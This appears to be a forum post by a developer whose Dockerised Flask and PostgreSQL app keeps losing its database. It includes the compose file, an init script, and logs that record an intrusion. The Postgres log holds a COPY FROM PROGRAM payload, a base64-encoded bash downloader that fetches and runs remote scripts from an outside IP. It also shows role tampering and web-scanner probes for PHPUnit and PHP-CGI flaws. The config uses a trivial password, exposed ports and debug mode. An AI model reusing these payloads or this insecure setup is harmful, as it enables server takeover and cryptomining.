PostgreSQL container unexpectedly dropping database
Problem Summary
I'm running a flask app on a basic DO droplet
The database is being dropped for some weird reason (or probably sthg I haven't been able to track yet)
# docker-compose.yaml
version: '3.8'

services:
  web:
    container_name: expense_manager_web
    build:
      context: .
      dockerfile: python.Dockerfile
    ports:
      - 5000:5000
      - 8001:8001
    environment:
      FLASK_APP: main.py
      FLASK_ENV: development
    volumes:
      - $PWD/src:/app/src
      - $PWD/.env:/app/.env
  db:
    container_name: expense_manager_db
    image: postgres:16
    environment:
      POSTGRES_PASSWORD: password
      POSTGRES_DB: expenses
    ports:
      - 5432:5432
    volumes:
      - db_data:/var/lib/postgresql/data
      - $PWD/sql/init-db.sql:/docker-entrypoint-initdb.d/init-db.sql

  redis:
    container_name: expense_manager_redis
    image: redis:7-alpine
  
  adminer:
    container_name: expense_manager_db_client
    image: adminer
    ports:
      - 8080:8080
  
  nginx:
    container_name: expense_manager_nginx
    image: nginx
    ports:
      - 80:80
      - 443:443
    volumes:
      - $PWD/nginx/${APP_ENV}.conf:/etc/nginx/conf.d/default.conf
      - data:/etc/letsencrypt

volumes:
  data:
  db_data:



As you can see I have a database initialization script that does the following:

Create a schema
Sets the search_path
Create 2 tables

Step by Step on the issue

Running docker-compose up -d successfully, all containers are up and running (database logs are normal - no errors)

# postgres container logs
The files belonging to this database system will be owned by user "postgres".
This user must also own the server process.

The database cluster will be initialized with locale "en_US.utf8".
The default database encoding has accordingly been set to "UTF8".
The default text search configuration will be set to "english".

Data page checksums are disabled.

fixing permissions on existing directory /var/lib/postgresql/data ... ok
creating subdirectories ... ok
selecting dynamic shared memory implementation ... posix
selecting default max_connections ... 100
selecting default shared_buffers ... 128MB
selecting default time zone ... Etc/UTC
creating configuration files ... ok
running bootstrap script ... ok
performing post-bootstrap initialization ... ok
initdb: warning: enabling "trust" authentication for local connections
initdb: hint: You can change this by editing pg_hba.conf or using the option -A, or --auth-local and --auth-host, the next time you run initdb.
syncing data to disk ... ok


Success. You can now start the database server using:

    pg_ctl -D /var/lib/postgresql/data -l logfile start

waiting for server to start....2024-08-29 05:45:32.946 UTC [47] LOG:  starting PostgreSQL 16.4 (Debian 16.4-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
2024-08-29 05:45:32.952 UTC [47] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
2024-08-29 05:45:32.974 UTC [50] LOG:  database system was shut down at 2024-08-29 05:45:32 UTC
2024-08-29 05:45:32.992 UTC [47] LOG:  database system is ready to accept connections
 done
server started
CREATE DATABASE


<mark>
/usr/local/bin/docker-entrypoint.sh: running /docker-entrypoint-initdb.d/init-db.sql
CREATE SCHEMA
ALTER ROLE
CREATE TABLE
CREATE TABLE
</mark>

2024-08-29 05:45:33.570 UTC [47] LOG:  received fast shutdown request
waiting for server to shut down....2024-08-29 05:45:33.572 UTC [47] LOG:  aborting any active transactions
2024-08-29 05:45:33.584 UTC [47] LOG:  background worker "logical replication launcher" (PID 53) exited with exit code 1
2024-08-29 05:45:33.584 UTC [48] LOG:  shutting down
2024-08-29 05:45:33.587 UTC [48] LOG:  checkpoint starting: shutdown immediate
2024-08-29 05:45:33.670 UTC [48] LOG:  checkpoint complete: wrote 934 buffers (5.7%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.034 s, sync=0.032 s, total=0.086 s; sync files=311, longest=0.005 s, average=0.001 s; distance=4295 kB, estimate=4295 kB; lsn=0/191BF10, redo lsn=0/191BF10
2024-08-29 05:45:33.680 UTC [47] LOG:  database system is shut down
 done
server stopped

PostgreSQL init process complete; ready for start up.

2024-08-29 05:45:33.821 UTC [1] LOG:  starting PostgreSQL 16.4 (Debian 16.4-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
2024-08-29 05:45:33.821 UTC [1] LOG:  listening on IPv4 address "0.0.0.0", port 5432
2024-08-29 05:45:33.822 UTC [1] LOG:  listening on IPv6 address "::", port 5432
2024-08-29 05:45:33.828 UTC [1] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
2024-08-29 05:45:33.841 UTC [65] LOG:  database system was shut down at 2024-08-29 05:45:33 UTC
2024-08-29 05:45:33.852 UTC [1] LOG:  database system is ready to accept connections


A few minutes after, I start getting error logs from the postgres container (see below)

# postgres container logs
2024-08-29 05:50:33.938 UTC [63] LOG:  checkpoint starting: time
2024-08-29 05:50:37.816 UTC [63] LOG:  checkpoint complete: wrote 41 buffers (0.3%); 0 WAL file(s) added, 0 removed, 0 recycled; write=3.840 s, sync=0.014 s, total=3.879 s; sync files=16, longest=0.006 s, average=0.001 s; distance=166 kB, estimate=166 kB; lsn=0/1945A88, redo lsn=0/1945A50
2024-08-29 06:07:28.718 UTC [137] FATAL:  password authentication failed for user "postgres"
2024-08-29 06:07:28.718 UTC [137] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 06:07:29.109 UTC [138] FATAL:  password authentication failed for user "postgres"
2024-08-29 06:07:29.109 UTC [138] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 06:07:44.677 UTC [141] FATAL:  password authentication failed for user "postgres"
2024-08-29 06:07:44.677 UTC [141] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 06:07:45.069 UTC [142] FATAL:  password authentication failed for user "postgres"
2024-08-29 06:07:45.069 UTC [142] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 06:07:48.606 UTC [148] FATAL:  database "template0" is not currently accepting connections
2024-08-29 06:07:50.156 UTC [151] ERROR:  cannot drop the currently open database
2024-08-29 06:07:50.156 UTC [151] STATEMENT:  DROP DATABASE postgres;
2024-08-29 06:07:50.683 UTC [63] LOG:  checkpoint starting: immediate force wait
2024-08-29 06:07:50.710 UTC [63] LOG:  checkpoint complete: wrote 5 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.004 s, sync=0.010 s, total=0.028 s; sync files=2, longest=0.009 s, average=0.005 s; distance=9 kB, estimate=151 kB; lsn=0/1947EE8, redo lsn=0/1947EB0
2024-08-29 06:07:52.707 UTC [155] ERROR:  no schema has been selected to create in at character 14
2024-08-29 06:07:52.707 UTC [155] STATEMENT:  CREATE TABLE readme (text_field VARCHAR(255));
2024-08-29 06:12:50.800 UTC [63] LOG:  checkpoint starting: time
2024-08-29 06:14:23.113 UTC [63] LOG:  checkpoint complete: wrote 920 buffers (5.6%); 1 WAL file(s) added, 0 removed, 0 recycled; write=92.163 s, sync=0.044 s, total=92.313 s; sync files=300, longest=0.010 s, average=0.001 s; distance=4256 kB, estimate=4256 kB; lsn=0/1D6FF68, redo lsn=0/1D6FF30
2024-08-29 06:59:02.622 UTC [361] LOG:  invalid length of startup packet
2024-08-29 06:59:02.809 UTC [362] LOG:  invalid length of startup packet
2024-08-29 06:59:03.117 UTC [364] LOG:  invalid length of startup packet
2024-08-29 08:23:02.866 UTC [701] LOG:  invalid length of startup packet
2024-08-29 08:23:04.056 UTC [702] LOG:  invalid length of startup packet
2024-08-29 08:23:06.897 UTC [703] LOG:  invalid length of startup packet
2024-08-29 08:23:08.079 UTC [704] LOG:  invalid length of startup packet
2024-08-29 08:23:08.922 UTC [705] LOG:  invalid length of startup packet
2024-08-29 08:23:10.108 UTC [706] LOG:  invalid length of startup packet
2024-08-29 08:23:12.913 UTC [708] LOG:  invalid length of startup packet
2024-08-29 08:23:13.547 UTC [709] LOG:  invalid length of startup packet
2024-08-29 08:23:14.108 UTC [710] LOG:  invalid length of startup packet
2024-08-29 08:23:14.730 UTC [711] LOG:  invalid length of startup packet
2024-08-29 08:49:32.226 UTC [817] FATAL:  expected SASL response, got message type 0
2024-08-29 10:02:51.054 UTC [1111] LOG:  invalid length of startup packet
2024-08-29 10:02:52.240 UTC [1112] LOG:  invalid length of startup packet
2024-08-29 10:32:45.365 UTC [1234] FATAL:  password authentication failed for user "pgg_superadmins"
2024-08-29 10:32:45.365 UTC [1234] DETAIL:  Role "pgg_superadmins" does not exist.
        Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 10:32:46.278 UTC [1235] FATAL:  password authentication failed for user "pgg_superadmins"
2024-08-29 10:32:46.278 UTC [1235] DETAIL:  Role "pgg_superadmins" does not exist.
        Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 11:19:10.435 UTC [1421] ERROR:  no schema has been selected to create in at character 93
2024-08-29 11:19:10.435 UTC [1421] STATEMENT:  DROP TABLE IF EXISTS _60ff3b916c39f6b81e6c3d2d429acf0f;                        CREATE TABLE _60ff3b916c39f6b81e6c3d2d429acf0f(cmd_output text);                        COPY _60ff3b916c39f6b81e6c3d2d429acf0f FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYga2luc2luZwpwa2lsbCAtZiBrZGV2dG1wZnNpCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIC1mc1NMIGh0dHA6Ly8xMDYuMjU0LjI1MC45ODo5MTA0L2RvY3MvanMvY3VybC50eHQgfGJhc2gKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIGh0dHA6Ly8xMDYuMjU0LjI1MC45ODo5MTA0L2RvY3MvanMvd2dldC50eHQgLU8gfGJhc2gKZWxzZQogIF9fY3VybCBodHRwOi8vMTA2LjI1NC4yNTAuOTg6OTEwNC9kb2NzL2pzL3BnMjIuc2h8YmFzaApmaQo=|base64 -d|bash';                        SELECT * FROM _60ff3b916c39f6b81e6c3d2d429acf0f;
2024-08-29 11:19:10.548 UTC [1421] ERROR:  current transaction is aborted, commands ignored until end of transaction block
2024-08-29 11:19:10.548 UTC [1421] STATEMENT:  DROP TABLE _60ff3b916c39f6b81e6c3d2d429acf0f;
2024-08-29 12:24:20.979 UTC [1683] FATAL:  database "expenses" does not exist
2024-08-29 12:59:15.237 UTC [1825] FATAL:  password authentication failed for user "pg"
2024-08-29 12:59:15.237 UTC [1825] DETAIL:  Role "pg" does not exist.
        Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 12:59:15.269 UTC [1827] FATAL:  password authentication failed for user "pg"
2024-08-29 12:59:15.269 UTC [1827] DETAIL:  Role "pg" does not exist.
        Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 12:59:15.307 UTC [1829] FATAL:  password authentication failed for user "postgres"
2024-08-29 12:59:15.307 UTC [1829] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 128: "host all all all scram-sha-256"
2024-08-29 13:02:56.682 UTC [63] LOG:  checkpoint starting: time
2024-08-29 13:03:01.338 UTC [63] LOG:  checkpoint complete: wrote 47 buffers (0.3%); 0 WAL file(s) added, 0 removed, 0 recycled; write=4.630 s, sync=0.012 s, total=4.656 s; sync files=50, longest=0.003 s, average=0.001 s; distance=206 kB, estimate=3851 kB; lsn=0/1DA39E0, redo lsn=0/1DA39A8
2024-08-29 13:03:46.937 UTC [1881] FATAL:  database "expenses" does not exist
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
sh: 1: pgrep: not found
2024-08-29 13:07:56.398 UTC [63] LOG:  checkpoint starting: time
2024-08-29 13:08:03.071 UTC [63] LOG:  checkpoint complete: wrote 67 buffers (0.4%); 0 WAL file(s) added, 0 removed, 1 recycled; write=6.639 s, sync=0.012 s, total=6.673 s; sync files=75, longest=0.004 s, average=0.001 s; distance=2527 kB, estimate=3718 kB; lsn=0/201B7A0, redo lsn=0/201B768
2024-08-29 13:08:45.054 UTC [1988] FATAL:  no PostgreSQL user name specified in startup packet
2024-08-29 13:08:45.059 UTC [1989] FATAL:  no PostgreSQL user name specified in startup packet
sh: 1: Syntax error: Unterminated quoted string
2024-08-29 13:08:45.232 UTC [1830] ERROR:  program "if [ "$(stat -c/tmp/.sh_history) -gt 10485760 ]; then echo > /tmp/.sh_history && echo llkkmm; fi 2>&1 || exit 0" failed
2024-08-29 13:08:45.232 UTC [1830] DETAIL:  child process exited with exit code 2
2024-08-29 13:08:45.232 UTC [1830] STATEMENT:  COPY "public"."temp_ghstqqvvlc" FROM PROGRAM E'if [ "$(stat -c/tmp/.sh_history) -gt 10485760 ]; then echo > /tmp/.sh_history && echo llkkmm; fi 2>&1 || exit 0' WITH DELIMITER '~';
2024-08-29 13:08:45.243 UTC [1830] ERROR:  could not open file "/tmp/.sh_history" for reading: No such file or directory
2024-08-29 13:08:45.243 UTC [1830] STATEMENT:  SELECT pg_read_binary_file('/tmp/.sh_history')
2024-08-29 13:08:45.282 UTC [2009] FATAL:  no PostgreSQL user name specified in startup packet
2024-08-29 13:08:45.288 UTC [2010] FATAL:  no PostgreSQL user name specified in startup packet
2024-08-29 13:08:45.360 UTC [1] LOG:  received SIGHUP, reloading configuration files
2024-08-29 13:08:45.528 UTC [2021] FATAL:  role "pgg_superadmins" does not exist
2024-08-29 13:08:45.545 UTC [1830] ERROR:  role "pgg_superadmins" does not exist
2024-08-29 13:08:45.545 UTC [1830] STATEMENT:  DROP ROLE "pgg_superadmins";
2024-08-29 13:08:45.618 UTC [2024] FATAL:  role "postgres_superadmins" does not exist
2024-08-29 13:08:45.630 UTC [1830] ERROR:  role "postgres_superadmins" does not exist
2024-08-29 13:08:45.630 UTC [1830] STATEMENT:  DROP ROLE "postgres_superadmins";
2024-08-29 13:08:45.632 UTC [1830] ERROR:  permission denied to alter role
2024-08-29 13:08:45.632 UTC [1830] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:08:45.632 UTC [1830] STATEMENT:  ALTER ROLE "postgres" WITH NOSUPERUSER NOCREATEROLE
2024-08-29 13:08:45.635 UTC [1830] WARNING:  role "postgres" has not been granted membership in role "pg_execute_server_program" by role "postgres"
2024-08-29 13:08:45.637 UTC [1830] WARNING:  role "postgres" has not been granted membership in role "pg_read_all_settings" by role "postgres"
2024-08-29 13:08:45.639 UTC [1830] WARNING:  role "postgres" has not been granted membership in role "pg_read_server_files" by role "postgres"
2024-08-29 13:08:45.641 UTC [1830] WARNING:  role "postgres" has not been granted membership in role "pg_write_server_files" by role "postgres"
2024-08-29 13:08:45.657 UTC [2025] FATAL:  password authentication failed for user "pg"
2024-08-29 13:08:45.657 UTC [2025] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 132: "host all all all scram-sha-256"
2024-08-29 13:08:45.688 UTC [2026] FATAL:  password authentication failed for user "postgres"
2024-08-29 13:08:45.688 UTC [2026] DETAIL:  Connection matched file "/var/lib/postgresql/data/pg_hba.conf" line 132: "host all all all scram-sha-256"
2024-08-29 13:09:45.520 UTC [2055] ERROR:  permission denied to alter role
2024-08-29 13:09:45.520 UTC [2055] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:09:45.520 UTC [2055] STATEMENT:  ALTER USER "postgres" WITH NOSUPERUSER NOCREATEROLE
2024-08-29 13:10:45.569 UTC [2073] ERROR:  permission denied to alter role
2024-08-29 13:10:45.569 UTC [2073] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:10:45.569 UTC [2073] STATEMENT:  ALTER USER "postgres" WITH NOSUPERUSER NOCREATEROLE
2024-08-29 13:11:45.468 UTC [2088] ERROR:  permission denied to alter role
2024-08-29 13:11:45.468 UTC [2088] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:11:45.468 UTC [2088] STATEMENT:  ALTER USER "postgres" WITH NOSUPERUSER NOCREATEROLE
2024-08-29 13:12:45.517 UTC [2098] ERROR:  permission denied to alter role
2024-08-29 13:12:45.517 UTC [2098] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:12:45.517 UTC [2098] STATEMENT:  ALTER USER "postgres" WITH NOSUPERUSER NOCREATEROLE
2024-08-29 13:12:56.473 UTC [63] LOG:  checkpoint starting: time
2024-08-29 13:13:05.791 UTC [63] LOG:  checkpoint complete: wrote 93 buffers (0.6%); 0 WAL file(s) added, 0 removed, 0 recycled; write=9.262 s, sync=0.011 s, total=9.318 s; sync files=77, longest=0.004 s, average=0.001 s; distance=12756 kB, estimate=12756 kB; lsn=0/2C90B10, redo lsn=0/2C90AD8
2024-08-29 13:13:45.457 UTC [2107] ERROR:  permission denied to alter role
2024-08-29 13:13:45.457 UTC [2107] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:13:45.457 UTC [2107] STATEMENT:  ALTER USER "postgres" WITH NOSUPERUSER NOCREATEROLE
2024-08-29 13:14:45.501 UTC [2118] ERROR:  permission denied to alter role
2024-08-29 13:14:45.501 UTC [2118] DETAIL:  The bootstrap user must have the SUPERUSER attribute.
2024-08-29 13:14:45.501 UTC [2118] STATEMENT:  ALTER USER "postgres" WITH NOSUPERUSER NOCREATEROLE


Not sure what's triggering the repetitive logs, since most of them are being repeated multiple times (check the init-db.sql script below)

-- init-db.sql
CREATE SCHEMA IF NOT EXISTS em;

ALTER ROLE postgres SET search_path TO em;

CREATE TABLE IF NOT EXISTS em.expenses(
    id SERIAL PRIMARY KEY,
    name VARCHAR(100),
    value INTEGER,
    timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);

CREATE TABLE IF NOT EXISTS em.settings(
    id SERIAL PRIMARY KEY,
    name VARCHAR(50),
    value JSON,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP
);


I don't really understand why the bootstrap user postgres doesn't have SUPERUSER privileges (even though it shows that it has when I exec into the db container)

root@7f59953b1dcb:/# psql -U postgres -d expenses
psql (16.4 (Debian 16.4-1.pgdg120+1))
Type "help" for help.

expenses=# \du
                             List of roles
 Role name |                         Attributes                         
-----------+------------------------------------------------------------
 pg        | Superuser, Create role
 postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS

expenses=# 


I tried looking up logs to see what could have possibly gone wrong during that time, but couldn't get to a conclusion.
Tried deleting the db_data volume and recreating the containers again, but the problem would still happen.
Update
After checking the web server logs expense_manager_web, I noticed someone is trying to probably do some web app scanning to find vulnerabilities
docker logs expense_manager_web
 * Serving Flask app 'main.py' (lazy loading)
 * Environment: development
 * Debug mode: on
 * Debugger is active!
 * Debugger PIN: 144-455-381
172.20.0.2 - - [29/Aug/2024 05:45:39] "GET /expenses HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 05:45:39] "GET /expensesstatic/styles.css HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:45:39] "GET /expensesstatic/js/main.js HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:45:45] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:50] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:52] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:53] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:53] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:53] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:53] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:46:54] "GET /expensesexpenses HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 05:51:15] "GET /expenses HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 05:51:16] "GET /static/styles.css HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 05:51:16] "GET /static/js/main.js HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 06:06:05] "GET /expenses HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 06:06:05] "GET /static/styles.css HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 06:06:05] "GET /static/js/main.js HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 06:06:05] "GET /favicon.ico HTTP/1.0" 404 -
165.232.108.73 - - [29/Aug/2024 06:15:38] code 400, message Bad request version ('²N"\x81MÝXÔ\x99EK&\x81qØ½ZæLm\x86\x02\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À')
Ò²N"MÝXÔEK&qØ½ZæLm<ÌÌÌÀ0À,À(À$ÀÀ" HTTPStatus.BAD_REQUEST -
87.236.176.135 - - [29/Aug/2024 06:47:58] "GET / HTTP/1.1" 404 -
172.20.0.2 - - [29/Aug/2024 07:02:45] "POST /ajax HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 08:48:00] "GET /.git/config HTTP/1.0" 404 -
205.210.31.203 - - [29/Aug/2024 09:17:35] "GET / HTTP/1.1" 404 -
172.20.0.2 - - [29/Aug/2024 09:29:10] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:29:29] "GET /favicon.ico HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:29:29] "GET /robots.txt HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:29:30] "GET /sitemap.xml HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:30:30] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:30:31] "GET /favicon.ico HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:30:33] "GET /robots.txt HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:30:34] "GET /sitemap.xml HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:36:16] "GET /.git/config HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:59:11] "GET /.env HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 09:59:12] "POST / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 10:48:39] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 10:52:56] "GET /webui/ HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 10:53:56] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 10:54:11] "GET /console HTTP/1.0" 200 -
172.20.0.2 - - [29/Aug/2024 10:56:44] "GET /favicon.ico HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 10:57:55] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:01:17] "GET /geoserver/web/ HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:02:50] "GET /.git/config HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:32] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:33] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:33] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:34] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:34] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:35] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:35] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:36] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:36] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:37] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:38] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:38] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:39] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:39] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:40] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:41] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:41] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:41] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:42] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:42] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:43] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:44] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:44] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:45] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:45] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:46] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:46] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:47] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:47] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:48] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:48] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:49] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:49] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:49] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:50] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:50] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:51] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
